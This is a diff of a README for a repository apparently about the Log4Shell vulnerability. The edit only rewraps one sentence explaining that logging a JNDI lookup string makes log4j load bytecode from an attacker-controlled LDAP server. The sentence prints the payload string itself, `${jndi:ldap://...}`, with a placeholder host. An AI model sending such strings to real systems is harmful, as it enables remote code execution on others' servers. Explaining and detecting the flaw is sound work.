o7-Fire/Log4Shell/README.md

 # Log4Shell Zero-Day Exploit

-if attacker manage to log this string `${jndi:ldap://someaddresshere/param1=value1}` to log4j it somehow loads the class/java bytecode sent by Attacker Controlled LDAP Server the bytecode could be used to execute any malicious code or do some little trolling.
+if attacker manage to log this string `${jndi:ldap://someaddresshere/param1=value1}` to log4j it somehow loads the class/java bytecode sent by Attacker Controlled LDAP Server.
+The bytecode could be used to execute any malicious code or do some little trolling.

 ## Detection